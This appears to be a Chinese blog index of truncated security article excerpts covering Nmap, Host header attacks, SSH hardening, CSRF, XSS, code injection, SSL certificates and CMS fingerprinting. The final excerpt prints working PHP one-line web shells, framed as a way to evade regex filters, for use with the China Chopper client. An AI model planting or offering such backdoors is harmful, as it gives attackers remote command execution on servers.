虽然Nmap这些年来功能越来越多, 它也是从一个高效的端口扫描器开始的,并且那仍然是它的核心功能。 nmap 这个简单的命令扫描主机上的超过 1660个TCP端口。 。许多传统的端口扫描器只列出所有端口是开放还是关闭的, Nmap的信息粒度比它们要细得多。 它把端口分成六个状态: open(开放的), closed(关闭的),filtered(被过滤的), unfiltered(未被过滤的), open|filter…
在web访问过程中,客户端可以任意修改request header fields。这样我们就要明确一点,所有来自客户端的数据信息都不可信。 当客户端在请求头中人为添加了host头字段信息。这种就是利用http协议修改Host请求头攻击行为。 生效过程 客户端访问http://example.com/时,添加request header 中host=evil.com。 这种情况,会请求到example.com的服务器上…
当前的网络环境,黑客行为猖獗地超出一个善良人的想象。 一台在线服务器如果没有限制sshd服务的端口,每天不会少于几百次的暴力破解密码操作。 为了服务器的安全着想,最好要限制可登录IP地址;不然可以限制使用证书登录;再不然就是设置密码机制了。 密码机制 包括几个方面,根据个人情况选择使用。 1、密码质量检测:包括字符设定(数字|大小写|特殊字符)和密码长度 2、密码有效期:一个密码的有效时间 3、防止重复使用旧密码 密…
概述 Linux 服务器系统通常使用sshd服务作为远程连接管理工具。在sshd服务的配置中有两项提醒消息,其中默认包含了系统版本和内核版本信息。如果开启这两个提醒消息,会暴露操作系统的信息,增加系统的安全风险。 提醒消息 这两条提醒消息的内容都是使用文件配置 /etc/issue.net 在用户输入密码之前展示 /etc/motd 用户登录后展示 用户登录前显示警告消息 1、编辑/etc/issue.net 文件,…
CSRF(Cross-site request forgery)跨站请求伪造,也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。 尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。 与XSS攻击相比,CSRF攻击往往不大流行(因此对其进行防范的…
为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。 XSS是一种在web应用中的计算机安全漏洞,它是恶意web用户将代码植入到提供给其它用户使用的页面中。 XSS攻击分成两类 1、来自内部的攻击,主要指的是利用程序自身的漏洞,构造跨站语句,如:dvbbs的showerror.asp存在的跨站漏洞。 2、来自外部的攻击,主要指的自己构造XSS跨站漏洞网页…
代码注入(Code injection)可被攻击者用来导入代码到某特定的计算机程序,以改变程序的运行进程或目的。代码注入攻击的结果可以是灾难性的。 例如说:代码注入可作为许多电脑蠕虫繁殖的温床。 案例 冲浪者在web站点的输入接口,提交js\sql\php\html等代码;如果网站开发者没有考虑到对输入信息的校验和转义,很可能危机到网站上的数据。 代码注入的用途 通过代码注入技术在黑或者破解系统上,以获取信息、提权、…
SSL数字证书通过第三方SSL证书机构颁发 主要用于:身份证明、分发公钥、验证证书的合法性 SSL数字证书有以下几种: 企业级别:EV(Extended Validation)、OV(Organization Validation) 个人级别:IV(Identity Validation)、DV(Domain Validation) 其中 EV、OV、IV 需要付费;。 免费的证书安全认证级别一般比较低,不显示单位名…
1、根据 meta 信息判断 不少的网站会在 meta 添加框架的信息,比如 Joomla、XOOPS、MediaWiki 会添加 generator;phpBB 会添加 copyright;Avactis 会添加 author。通过这些可以探测网站使用的建站系统,从而知道使用的语言。 2、根据 script 标签判断 和上面的一样,探测网站使用的建站系统,从而知道使用的语言。 3、根据 header 信息 通过 h…
可以通过以上方法修改assert后门,达到绕过正则: <?phpassert($_POST[password]);?> 三.变形一句话: <?php$_GET['xxoo']($_POST['cmd']);?> 客户端用菜刀,密码cmd,url为test.php?xxoo=assert <?php$_POST['xxoo']($_POST['cmd']);?> 这个是直接发post…